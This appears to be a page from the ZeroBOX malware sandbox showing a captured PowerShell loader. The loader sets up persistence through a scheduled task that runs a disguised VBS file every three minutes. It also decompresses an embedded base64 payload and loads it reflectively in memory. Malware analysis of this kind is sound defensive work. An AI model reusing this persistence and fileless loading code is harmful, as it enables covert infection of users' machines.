Static | ZeroBOX
No static analysis available.
$action = New-ScheduledTaskAction -Execute 'C:\ProgramData\WindowsHost\WindowsStateRepositoryCore.vbs'
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 3)
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "my-task"
$wgmoiXOoYKyGtKX = @'
zL0HvFxF9Th+9+7ubdve7O67W9+7m355+xJSKO8lkAKClNCL9IQOEVjgBQQij6hYgRBUFJ8BISj2ChrsqFgRxRY1kqdYsffyVUj+p8zcsrsB/Or39/nnk3d37jkzc6ecOXPmzJkzR522WUtqmpaCv927Ne1Bjf+t1J7930b4y3sfy2sP2I/OeDCx+tEZJ1508UTr8is7F1559qWtc8++7LLO+tY557euvOqy1sWXtZ53zAmtSzvnnb8gl3NmyzyOPUTTVieS2qXLLz1b5fsjTU9kEhlNOw1KZjFs+BoIt1SMlRzWudyaFv5qDyUJrhF65cs1bYD+h7/BD/370ouS2glUmaS2MN2nkncntexzaIuef62g6PTPgvfDIu8L1p9/zXr4nX2KrNdpYbkjWaxdcOXEledCmMoGZdQM+D0jGYu3Ev4vuPL8SzoQMSvLTHmd0xPvoJ5yXsNxsGy6ltZSt+nawz/XiCZq/LV/69+w7ic0zRmB3xT+3jcBWTgbAZaaMDGEfTZhYSiJIRtDEDM1ommlhbo2CnlAZOFm2g3NrOxKjOrVjGa6GKhAoIqBtt7+ySRm2XHwGyqd/pzSYQE6mWi65HNKh8XtZKPpUs8pHVauk1PpFkC69HNJpyd9AYn8IqbktvE16pDnkNYvRctpPpc0j0GpdL+s0uG3rOf2rUGV5mBIY3OaZZpZgxgWEkN7pJ6JZIEpHf1m+FxjvluL5lmXeX5OH6H64jiFDhbJorZrEOMbL8En0lZFffMYiJPhbx4c+Qh+POtDV7c3NiBqXX43P4lvN5t7/vbHKcbIcGlhUvt8gsaTuAEaPbVrEJpDr2yEtCl/ga4ZG+E9Vdlo09NB6N4IzWBoIYYgacrdmKNnPkhVoPcBegp6FgNcKQiVMbQIQ4MYWowhN8BWMLQEQ1UM7YOhGuVVp2cjiNmk0g3hSLsJiAf7yph4PYYgD8PdOIviz8ZYtwAu4RguJdxqbJwDwPLGufScR0+giVTryOcddJQ/jKN2FL+yL35lPob2
$jtwC = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($wgmoiXOoYKyGtKX),[IO.Compression.CompressionMode]::Decompress)
$H1 = New-Object Byte[](222208)
$jtwC.Read($H1, 0, 222208) | Out-Null
[Byte[]] $MyPt = [System.IO.Path]::([System.Threading.Thread]::'GetDomain'().'Load'($H1).'EntryPoint'.Invoke($Null,$Null))
[Object[]] $Params=@($MyPt.Replace("Framework64","Framework") ,$H1)
[System.Threading.Thread]::Sleep(1000)
return $T.GetMethod('Run').Invoke($null, $Params)
} catch { }
No antivirus signatures available.
No IRMA results available.